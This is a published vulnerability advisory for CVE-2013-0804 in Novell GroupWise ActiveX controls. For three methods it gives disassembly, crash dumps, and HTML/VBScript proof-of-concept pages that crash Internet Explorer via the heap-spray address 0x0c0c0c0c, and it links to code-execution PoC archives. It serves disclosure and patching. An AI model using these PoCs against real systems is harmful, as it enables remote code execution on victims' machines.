Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29236
HistoryApr 08, 2013 - 12:00 a.m.

Novell GroupWise Multiple Remote Code Execution Vulnerabilities

2013-04-0800:00:00
vulners.com
62

Advisory ID: HTB23131
Product: Novell GroupWise
Vendor: Novell Inc.
Vulnerable Version(s): 12.0.0.8586 and probably prior
Tested Version: 12.0.0.8586 on Windows 7 SP1 and Internet Explorer 9.0
Vendor Notification: November 26, 2012
Vendor Patch: January 30, 2013
Public Disclosure: April 3, 2013
Vulnerability Type: Untrusted Pointer Dereference [CWE-822]
CVE Reference: CVE-2013-0804
Risk Level: Critical
CVSSv2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple untrusted pointer dereference vulnerabilities in Novell GroupWise, which could be exploited to compromise a remote system.

1) Untrusted Pointer Dereference in Novell GroupWise: CVE-2013-0804

1.1 The vulnerability exists due to an untrusted pointer dereference error in the InvokeContact() method within the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program Files\Novell\GroupWise\gwabdlg.dll"

A remote attacker can pass an arbitrary value to the pInvokeParams argument of the InvokeContact() method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction.

Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register.

5722D301 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]

Later this value will be allocated into the stack:

5722D304 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX

The code continues its flow and enters a switch case algorithm:

5722D30A 83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1
5722D311 0F84 57010000 JE gwabdlg.5722D46E
5722D317 83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2
5722D31E 0F84 00010000 JE gwabdlg.5722D424

5722D324 83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3

5722D32B 0F84 83010000 JE gwabdlg.5722D4B4
5722D331 83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4
5722D338 0F84 AF020000 JE gwabdlg.5722D5ED
5722D33E 83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5
5722D345 0F84 9A030000 JE gwabdlg.5722D6E5
5722D34B 83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6

If an attacker can specify a custom switch value, in this case the number 3, it will jump to the address 0x5722D4B4

5722D4B4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
5722D4B7 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
5722D4BA 8365 D8 00 AND DWORD PTR SS:[EBP-28],0
5722D4BE 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28]
5722D4C1 50 PUSH EAX
5722D4C2 68 58122D57 PUSH gwabdlg.572D1258
5722D4C7 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C]
5722D4CA 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]
5722D4CD 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C]
5722D4D0 8B49 30 MOV ECX,DWORD PTR DS:[ECX+30]
5722D4D3 8B00 MOV EAX,DWORD PTR DS:[EAX]
5722D4D5 51 PUSH ECX
5722D4D6 FF10 CALL DWORD PTR DS:[EAX]

After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction:

0C0C0C0C 0C 0C OR AL,0C
0C0C0C0E 0C 0C OR AL,0C
0C0C0C10 0300 ADD EAX,DWORD PTR DS:[EAX]
0C0C0C12 0000 ADD BYTE PTR DS:[EAX],AL
0C0C0C14 0C 0C OR AL,0C
0C0C0C16 0C 0C OR AL,0C
0C0C0C18 0C 0C OR AL,0C
0C0C0C1A 0C 0C OR AL,0C

Crash details:

(162c.5ae0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll -
gwabdlg!DllUnregisterServer+0x4c10e:
5722d301 8b4004 mov eax,dword ptr [eax+4] ds:0023:0c0c0c0c=???

The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab –>
<head>
<title> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
arg1=202116104
target.InvokeContact arg1
End Sub
</script>
<body>
<h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4> Untrusted Pointer Dereference PoC </h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'
id='Target'></object>
</html>

Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_1.zip&quot;&gt;https://www.htbridge.com/advisory/HTB23131_POC_1.zip&lt;/a&gt;
Archive's Password: HTB23131_novell(gw)

1.2 The vulnerability exists due to an untrusted pointer dereference error in the GenerateSummaryPage() method within the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program Files\Novell\GroupWise\gwabdlg.dll".

A remote attacker can pass an arbitrary value to the pInvokeParams argument of the GenerateSummaryPage() method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction.

Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register.

5722D301 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]

Later this value will be allocated into the stack:

5722D304 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX

The code continues its flow and enters a switch case algorithm:

5722D30A 83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1
5722D311 0F84 57010000 JE gwabdlg.5722D46E
5722D317 83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2
5722D31E 0F84 00010000 JE gwabdlg.5722D424

5722D324 83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3

5722D32B 0F84 83010000 JE gwabdlg.5722D4B4
5722D331 83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4
5722D338 0F84 AF020000 JE gwabdlg.5722D5ED
5722D33E 83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5
5722D345 0F84 9A030000 JE gwabdlg.5722D6E5
5722D34B 83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6

If an attacker can specify a custom switch value, in this case the number 3, it will jump to address 0x5722D4B4

5722D4B4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
5722D4B7 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
5722D4BA 8365 D8 00 AND DWORD PTR SS:[EBP-28],0
5722D4BE 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28]
5722D4C1 50 PUSH EAX
5722D4C2 68 58122D57 PUSH gwabdlg.572D1258
5722D4C7 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C]
5722D4CA 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]
5722D4CD 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C]
5722D4D0 8B49 30 MOV ECX,DWORD PTR DS:[ECX+30]
5722D4D3 8B00 MOV EAX,DWORD PTR DS:[EAX]
5722D4D5 51 PUSH ECX
5722D4D6 FF10 CALL DWORD PTR DS:[EAX]

After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction.

0C0C0C0C 0C 0C OR AL,0C
0C0C0C0E 0C 0C OR AL,0C
0C0C0C10 0300 ADD EAX,DWORD PTR DS:[EAX]
0C0C0C12 0000 ADD BYTE PTR DS:[EAX],AL
0C0C0C14 0C 0C OR AL,0C
0C0C0C16 0C 0C OR AL,0C
0C0C0C18 0C 0C OR AL,0C
0C0C0C1A 0C 0C OR AL,0C

Crash details:

(162c.5ae0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll -
gwabdlg!DllUnregisterServer+0x4c10e:
5722d301 8b4004 mov eax,dword ptr [eax+4] ds:0023:0c0c0c0c=???

The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab –>
<head>
<title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
arg1=202116108
arg2="defaultV"
arg3="defaultV"
target.GenerateSummaryPage arg1 ,arg2 ,arg3
End Sub
</script>
<body>
<h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4>Untrusted Pointer Dereference PoC</h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address
0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'
id='Target'></object>
</html>

Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_2.zip&quot;&gt;https://www.htbridge.com/advisory/HTB23131_POC_2.zip&lt;/a&gt;
Archive's Password: HTB23131_novell(gw)

1.3 The vulnerability exists due to an untrusted pointer dereference error in the SecManageRecipientCertificates() method within the ActiveX control (gwmim1.ocx, GUID {BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}, located by default in "C:\Program Files\Novell\GroupWise\gwmim1.ocx".

A remote attacker can pass an arbitrary value to the lProp argument of the SecManageRecipientCertificates() method and trigger the ACCESS_VIOLATION exception on a MOV EDX,DWORD PTR DS:[ECX] instruction.
Since it is possible to supply a specially crafted pointer, an attacker can abuse this flaw relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer into the EDX register.
10014805 MOV EDX,DWORD PTR DS:[ECX]

Later the same operation is performed, however this time it is the EAX register that inherits the untrusted pointer value.
10014807 MOV EAX,DWORD PTR DS:[EDX]

Eventually code execution is reached at the address 0x10014809
10014809 CALL EAX

Crash details:

(5c78.58f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0275c46c ebx=00000000 ecx=0c0c0c0c edx=0000001b esi=0956de40 edi=00000000
eip=10014805 esp=0275c45c ebp=0275c55c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwmim1.ocx -
gwmim1!DllUnregisterServer+0x8cb5:
10014805 8b11 mov edx,dword ptr [ecx] ds:0023:0c0c0c0c=???

The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab –>
<head>
<title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
arg1=202116108
target.SecManageRecipientCertificates arg1
End Sub
</script>
<body>
<h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4> Untrusted Pointer Dereference PoC </h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:BFEC5A01-1EB1-11D1-BC96-00805FC1C85A'id='Target'></object>
</html>

Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_3.zip&quot;&gt;https://www.htbridge.com/advisory/HTB23131_POC_3.zip&lt;/a&gt;
Archive's Password: HTB23131_novell(gw)


Solution:

Apply GroupWise 8.0.3 Hot Patch 2 (or later) or GroupWise 2012 SP1 Hot Patch 1

More Information:
http://www.novell.com/support/kb/doc.php?id=7011687


References:

[1] High-Tech Bridge Advisory HTB23131 - https://www.htbridge.com/advisory/HTB23131 - Novell GroupWise Multiple Remote Code Execution Vulnerabilities.
[2] Novell Inc. - http://www.novell.com - Novell GroupWise is a collaboration software for large enterprises.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] Novell GroupWise Untrusted Pointer Dereference Exploitation - https://www.htbridge.com/publications/novell_groupwise_untrusted_pointer_dereference_exploitation.html


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.